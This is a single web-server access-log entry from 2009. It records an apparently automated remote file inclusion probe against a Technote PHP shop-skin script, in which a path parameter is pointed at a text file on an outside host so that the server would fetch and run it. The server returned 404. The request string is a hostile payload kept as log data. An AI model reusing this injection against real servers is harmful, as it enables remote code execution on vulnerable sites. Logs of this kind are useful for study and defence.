77.221.130.17 - - [09/Nov/2009:02:39:55 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
